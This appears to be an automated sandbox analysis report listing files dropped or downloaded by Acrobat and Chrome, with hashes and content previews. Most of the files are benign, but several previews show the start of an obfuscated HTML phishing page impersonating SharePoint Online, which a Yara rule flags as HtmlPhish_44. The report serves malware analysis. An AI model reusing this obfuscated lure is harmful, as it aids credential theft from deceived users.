                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):16603
                                                                                                Entropy (8bit):5.3527962797886035
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:gAch0Idi1ZGeOmdoqAUDA6Tm+pyy8jDl9OuSMUkt8ZgMrE7G9T6mA0J0pcL1Fx7m:bOzz
                                                                                                MD5:13CAEB7FC2CA70DCA72417ED40D54201
                                                                                                SHA1:F93ED2EE2263C556E7DC78ABF3C85D598DB5B2A1
                                                                                                SHA-256:071BA03CE35965F107B6146E2B6891143283C58ECEAB9EBF5AE78CD3303A31B0
                                                                                                SHA-512:5E03156CC946FC0E397C51D5824E409DFFA619D9E1D9A03DFB31D906020D8AB8BD153DC955EB1E073410955D11AFF3E6BB9FC0F584FE9EE624E92C9F7E54A723
                                                                                                Malicious:false
                                                                                                Preview:SessionID=bd4bef66-3481-4acb-8e0e-db1c9a22d650.1736317343696 Timestamp=2025-01-08T01:22:23:696-0500 ThreadID=2872 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=bd4bef66-3481-4acb-8e0e-db1c9a22d650.1736317343696 Timestamp=2025-01-08T01:22:23:700-0500 ThreadID=2872 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=bd4bef66-3481-4acb-8e0e-db1c9a22d650.1736317343696 Timestamp=2025-01-08T01:22:23:700-0500 ThreadID=2872 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=bd4bef66-3481-4acb-8e0e-db1c9a22d650.1736317343696 Timestamp=2025-01-08T01:22:23:700-0500 ThreadID=2872 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=bd4bef66-3481-4acb-8e0e-db1c9a22d650.1736317343696 Timestamp=2025-01-08T01:22:23:700-0500 ThreadID=2872 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):29752
                                                                                                Entropy (8bit):5.382479383465379
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rB:IRQ7
                                                                                                MD5:BD09FE42EE8B101B6FD266BDDDF04DC9
                                                                                                SHA1:3680C0891F451DEEBC552DABB105E0BCEE7637BF
                                                                                                SHA-256:8BDCA4AD7B2ADED0E0AFE879403B9625C9485F250A9ADB455B4668C0C4041DC1
                                                                                                SHA-512:168DEACDF1F78700763C63E422F1A756C643851C4816EF97B7CB21BB1661302D2E050DB5232541798115019AD5E67D6CC4A373D222D2444073E96D1E0B32A9FB
                                                                                                Malicious:false
                                                                                                Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                Category:dropped
                                                                                                Size (bytes):758601
                                                                                                Entropy (8bit):7.98639316555857
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                MD5:3A49135134665364308390AC398006F1
                                                                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                Malicious:false
                                                                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                Category:dropped
                                                                                                Size (bytes):386528
                                                                                                Entropy (8bit):7.9736851559892425
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                Malicious:false
                                                                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                Category:dropped
                                                                                                Size (bytes):1407294
                                                                                                Entropy (8bit):7.97605879016224
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                                MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                                SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                                SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                                SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                                Malicious:false
                                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                Category:dropped
                                                                                                Size (bytes):1419751
                                                                                                Entropy (8bit):7.976496077007677
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                                                MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                                                SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                                                SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                                                SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                                                Malicious:false
                                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (5493), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):5512
                                                                                                Entropy (8bit):4.1138191948386424
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:uoaANfBeSTJQOFghv5UBG2mF6q8mJpOZc1ZuKN3FE/OYBPhlQGQESC4PElQGQES4:3acASTJbWmGdsan8
                                                                                                MD5:04B31307F2BE6A4BF330911850F36727
                                                                                                SHA1:D2B2C1F456045AC3617DBA716AE9AE042FA7C236
                                                                                                SHA-256:36FA1B7B61B1F253F765EE37D0A2FF4989E2C28A924022B2F6CE85AC267AB3D3
                                                                                                SHA-512:CC495A3CE3739D4F9C1C24D73825C3214762F99FC26EACCA8E522B5550AE8A901DBF4F23BF67EFC54D6B0DA160969590F82BF19AC9E2BE7E880759C8C478761A
                                                                                                Malicious:false
                                                                                                Preview:.<script>.. ..document.write(unescape("%0A%3C%21doctype%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%3Chead%3E%0A%20%20%20%20%3Ctitle%3EShare%20Point%20Online%3C/title%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1%22%3E%0A%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22https%3A//maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css%22%3E%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js%22%3E%3C/script%3E%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js%22%3E%3C/script%3E%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js%22%3E%3C/script%3E%0A%20%20%20%20%3Cstyle%20type%3D%22text/css%22%3E%0A%20%20%20%20%20%20body%7B%0A%20%20%20%20%20%20%20%20font-size%3A%2014px%3B%0A%20%20%20%20%20%20%7D%0A
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (19623), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):19660
                                                                                                Entropy (8bit):4.049942617070363
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:3ajgJbvGdsWbXDXpxXzaNfECq5TrZRbArkhIAvT:LpvVWbTZxON8Z5TrZRbAohzr
                                                                                                MD5:E32470AC49FB092A5D9A74DCE684BBEC
                                                                                                SHA1:6C65899383CBE89DD22603C5C3F20C38B8778539
                                                                                                SHA-256:65969D69201AA1C44B52FD6719305C2B92CF83B56B64EC7724DE7783DE18FE50
                                                                                                SHA-512:4124D97B8D4A582A0C6D32E7EC6CA986C04884F1DD1AC48DCD8A1DA6B5E46A1260FFC6C1B96F3E3B3676CC0FFF2AC31500306E1E7CC7BECEB9D978BF2C909F56
                                                                                                Malicious:false
                                                                                                Preview:.<script>.. ..document.write(unescape("%0A%3C%21doctype%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%3Chead%3E%0A%20%20%20%20%3Ctitle%3EShare%20Point%20Online%3C/title%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1%22%3E%0A%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22https%3A//maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css%22%3E%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js%22%3E%3C/script%3E%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js%22%3E%3C/script%3E%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js%22%3E%3C/script%3E%0A%20%20%20%20%3Cstyle%20type%3D%22text/css%22%3E%0A%20%20%20%20%20%20body%7B%0A%20%20%20%20%20%20%20%20font-size%3A%2014px%3B%0A%20%20%20%20%20%20%7D%0A
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (19623), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):19660
                                                                                                Entropy (8bit):4.049942617070363
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:3ajgJbvGdsWbXDXpxXzaNfECq5TrZRbArkhIAvT:LpvVWbTZxON8Z5TrZRbAohzr
                                                                                                MD5:E32470AC49FB092A5D9A74DCE684BBEC
                                                                                                SHA1:6C65899383CBE89DD22603C5C3F20C38B8778539
                                                                                                SHA-256:65969D69201AA1C44B52FD6719305C2B92CF83B56B64EC7724DE7783DE18FE50
                                                                                                SHA-512:4124D97B8D4A582A0C6D32E7EC6CA986C04884F1DD1AC48DCD8A1DA6B5E46A1260FFC6C1B96F3E3B3676CC0FFF2AC31500306E1E7CC7BECEB9D978BF2C909F56
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\Downloads\Unpaid TV License Statement- Copy.html.crdownload, Author: Joe Security
                                                                                                Preview:.<script>.. ..document.write(unescape("%0A%3C%21doctype%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%3Chead%3E%0A%20%20%20%20%3Ctitle%3EShare%20Point%20Online%3C/title%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1%22%3E%0A%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22https%3A//maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css%22%3E%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js%22%3E%3C/script%3E%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js%22%3E%3C/script%3E%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js%22%3E%3C/script%3E%0A%20%20%20%20%3Cstyle%20type%3D%22text/css%22%3E%0A%20%20%20%20%20%20body%7B%0A%20%20%20%20%20%20%20%20font-size%3A%2014px%3B%0A%20%20%20%20%20%20%7D%0A
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with very long lines (59765)
                                                                                                Category:downloaded
                                                                                                Size (bytes):60044
                                                                                                Entropy (8bit):5.145139926823033
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:wfAnnayQIk8HVheIE8Dg76TXQI4vPKMEK6viTlCDFm4n6xOp6Pxg3/wCVaAk2:wfUnTcWCw6xJxg7aAz
                                                                                                MD5:02D223393E00C273EFDCB1ADE8F4F8B1
                                                                                                SHA1:0CC93B8421D89C24A889642428B363CB831DE78A
                                                                                                SHA-256:79C599DD760CEC0C1621A1AF49D9A2A49DA5D45E1B37D4575BACE0A5E0226582
                                                                                                SHA-512:339296DF3B6E2080A65488634AA5DED35A15D9BA5EDB8F203B1AA695C62B13302FC2CECFC37CFA04AD2219BAF0BDDAD4414862DDE5E0B71A7923C3C3A3D61F8D
                                                                                                Malicious:false
                                                                                                URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
                                                                                                Preview:/*!. * Bootstrap v4.5.2 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap={},t.jQuery,t.Popper)}(this,(function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function o(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function s(){return(s=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&Objec
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with very long lines (21084)
                                                                                                Category:dropped
                                                                                                Size (bytes):21257
                                                                                                Entropy (8bit):5.218656398361519
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:knMQG5rwVO7dV9nNbRGCB9D45Hkn5vj2xpOxvIAgD75zBi5vISg3gzopL9TidOg3:P5sg7X/jD45eSxpOxvKD73i5vTzwL9Ti
                                                                                                MD5:84415B7368FD6FC764CBE86039CE0626
                                                                                                SHA1:62F238E73348C77EB9E865426A7D1B7DE23CBB2D
                                                                                                SHA-256:C776195AD46333C6C9A9FE3C74502FFEA9A02FAF122388EA3567922CC65A3060
                                                                                                SHA-512:8423F7A626064813EA9D7CA974AC4A3D23B304717BE6853CC10F356BA3A21971C531E2ACF7FF0285B81897BA54BF02265C96F4DCDE1BB35A350F399BA2479E17
                                                                                                Malicious:false
                                                                                                Preview:/*. Copyright (C) Federico Zivolo 2019. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=e.ownerDocument.defaultView,n=o.getComputedStyle(e,null);return t?n[t]:n}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function i(e){return e&&e.referenceNode?e.referenceNode:e}function r(e){return 11===e?re:10===e?pe:re||pe}function p(e){if(!e)return document.documentElement;for(var o=r(10)?document.body:
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with very long lines (65451)
                                                                                                Category:downloaded
                                                                                                Size (bytes):89476
                                                                                                Entropy (8bit):5.2896589255084425
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                Malicious:false
                                                                                                URL:https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
                                                                                                Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with very long lines (65326)
                                                                                                Category:downloaded
                                                                                                Size (bytes):160302
                                                                                                Entropy (8bit):5.078105585474276
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:V47CIJ0T2r+ryEIA1pDEBi8yNcuSEcA1/uypq3SYiLENM6HN26b:S7VSGGq3SYiLENM6HN26b
                                                                                                MD5:816AF0EDDD3B4822C2756227C7E7B7EE
                                                                                                SHA1:C470239D4C7DB36D56DC3A74A080C62218C6EDC4
                                                                                                SHA-256:5B0FBE5B7AD705F6A937C4998AD02F73D8F0D976FE231B74AEF0EC996990C93A
                                                                                                SHA-512:32844D968C5B4AD05C0FCCF733FD819A74FEAE0E08B0CC4F917686876CC3E8B18D34513CD16DE89EC02145C30032B4A8C962FDC43EC4AEDD267A7EEF47C2D466
                                                                                                Malicious:false
                                                                                                URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css
                                                                                                Preview:/*!. * Bootstrap v4.5.2 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors. * Copyright 2011-2020 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:bo
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 648 x 768, 8-bit/color RGBA, non-interlaced
                                                                                                Category:downloaded
                                                                                                Size (bytes):12501
                                                                                                Entropy (8bit):7.592325213252809
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:04ZerIk+uUBbvU6TXLUoWm5o5DvCdr8wqQh+QnXOH7eNRzWURe82bCBbowtEsjeP:LIIk+59LUiK9oTPo7WwUKbCB9p+
                                                                                                MD5:9C57EFAE5855E24B41A221154543EDE0
                                                                                                SHA1:79D97CE5C00C1C6E0AE68782FEA73F9D9892DB3A
                                                                                                SHA-256:1B0E467247B9DAB100FF77807AF502E4277F72F721241C3F5B2EB483971AA9FA
                                                                                                SHA-512:8698EE90DE2E63A9B7D622855BA8234395C2D9E0BC6815FD1768A5F41D3215C53967229DAEF11EF48ABC7BFFAF4E6AA3D2172FF4FC6BC6F342335D30CF411483
                                                                                                Malicious:false
                                                                                                URL:https://www.freepnglogos.com/uploads/microsoft-office-png-logo/microsoft-office-2013-symbol-logo-png-6.png
